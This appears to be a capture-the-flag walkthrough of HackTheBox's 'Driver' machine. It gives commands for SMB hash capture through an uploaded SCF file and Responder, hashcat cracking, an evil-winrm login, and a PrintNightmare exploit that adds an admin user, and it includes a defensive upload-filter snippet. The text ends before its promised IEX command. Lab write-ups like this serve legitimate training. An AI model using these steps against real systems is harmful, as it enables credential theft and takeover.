In this post, I would like to share a walkthrough of the Driver machine from HackTheBox.


This machine is rated Easy on HackTheBox.

Source: HackTheBox

What will you gain from the Driver machine?


For the user flag, you will use the SMB relay approach to obtain tony’s password.


As for the root flag, you need to run an exploit related to PrintNightmare.

Information Gathering


Once we have started the VPN connection, which requires a download from HackTheBox, we can start information gathering on the machine by running the command “nmap -sC -sV -p- <IP Address> -PN”.


Let’s try to access the website interface


We are required to enter a username and password to log in to the Dashboard. My guess for the credentials would be admin:admin.


(You may be wondering how I got the username admin. If you look carefully, there is wording such as “Please enter a password for admin”.)


Finally, we managed to log in to the Dashboard.

Gaining Privileged Access


On the menu bar, there’s nothing that can be used except the Firmware Updates function which leads to a page that requires us to update the printer’s firmware.


From the results, I noticed a lot of Metasploit-based methods, which I try to avoid. However, we managed to find a website that guides us through exploiting the machine without Metasploit.

Source: SMB Relay – Penetration Testing Lab (pentestlab.blog)

As a result, we will need to create a file in the SCF format that is shown in the screenshot above.


The only modification needed would be \\<Your IP Address>\share\<anyname>.ico


Let’s run the Responder tool with “sudo responder -wrf --lm -v -I tun0”; the tool then waits at “Listening for events”.


Once Responder has been started, we can finally upload the SCF file to the website and click “Submit”.


After a while, we receive a lot of NTLMv2 hashes, all of which belong to tony.
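As an added example (not part of the original post or the referenced article), this is how an upload handler such as the firmware page could reject these files by content: it flags INI-style shell files whose icon key points to a remote UNC path, which is the reference that makes Explorer authenticate to the listed host. It goes slightly beyond SCF by also checking the IconResource key; the function names and sample data are constructed for illustration.

```python
import re

# Keys in INI-style Windows shell files (.scf, .url, desktop.ini) that Explorer
# resolves on its own when it renders the containing folder.
ICON_KEYS = {"iconfile", "iconresource"}
# Remote reference: \\host\share, //host/share or file://host/...
# (\\?\ and \\.\ local device prefixes and file:///C:/ are not matched).
REMOTE = re.compile(r"^(?:[\\/]{2}(?![\\/?.])|file:[\\/]{2}[^\\/])", re.I)

def decode(raw: bytes) -> str:
    """Decode upload bytes; shell files may be saved as UTF-16 with a BOM."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def remote_icon_refs(raw: bytes) -> list[tuple[str, str, str]]:
    """Return (section, key, value) for every icon key that points off-host."""
    findings, section = [], ""
    for line in decode(raw).splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        value = value.strip().strip('"')
        if sep and key.strip().lower() in ICON_KEYS and REMOTE.match(value):
            findings.append((section, key.strip(), value))
    return findings

def accept_upload(raw: bytes) -> bool:
    """Decide on content, not extension, so a renamed SCF is still rejected."""
    return not remote_icon_refs(raw)

# Constructed samples. 192.0.2.10 is a documentation address (RFC 5737).
SCF_REMOTE = (b"[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\x.ico\r\n"
              b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
SCF_LOCAL = b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"

if __name__ == "__main__":
    for name, data in (("remote.scf", SCF_REMOTE), ("local.scf", SCF_LOCAL)):
        verdict = "accepted" if accept_upload(data) else "rejected"
        print(name, verdict, remote_icon_refs(data))
```

Content filtering only covers the upload path; blocking outbound SMB (TCP 445) from the host to untrusted networks stops the authentication attempt regardless of how the file arrived.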


Let’s save the first hash into a file and try to recover the password from it using a hashcat command such as “hashcat -m 5600 -a 0 <hash file> /<your file location that stored the rockyou>/rockyou.txt”.


Finally, we have the password for tony, which is liltony.


Let’s try to log in to the machine with the evil-winrm tool, using a command like “evil-winrm -i 10.10.11.106 -u tony -p liltony”.


We can read the user flag by executing the command “type C:\Users\tony\Desktop\user.txt”.

Escalate to Admin Privileges on Driver Machine

PrintNightmare Vulnerability


At last, I can test the PrintNightmare vulnerability on an HTB machine.


For those who are not familiar with the PrintNightmare exploit, you can look it up online.


Firstly, you need to download the PrintNightmare exploit by running the command “git clone https://github.com/calebstewart/CVE-2021-1675” on your own machine.


After that, we can upload CVE-2021-1675.ps1 to the HTB machine.


Next, we can use the command “Import-Module .\CVE-2021-1675.ps1”.


Finally, we can create a new username and password by using the command Invoke-Nightmare -NewUser "anything" -NewPassword "anything"


As a result, we can log in to the machine using the credentials that we created earlier.


We should be able to obtain the root flag by executing “type C:\Users\administrator\Desktop\root.txt”.

Additional Information


In case we hit an error when trying to import the ps1 module on the HTB machine, we can try to download the file onto the machine using the IEX command shown below: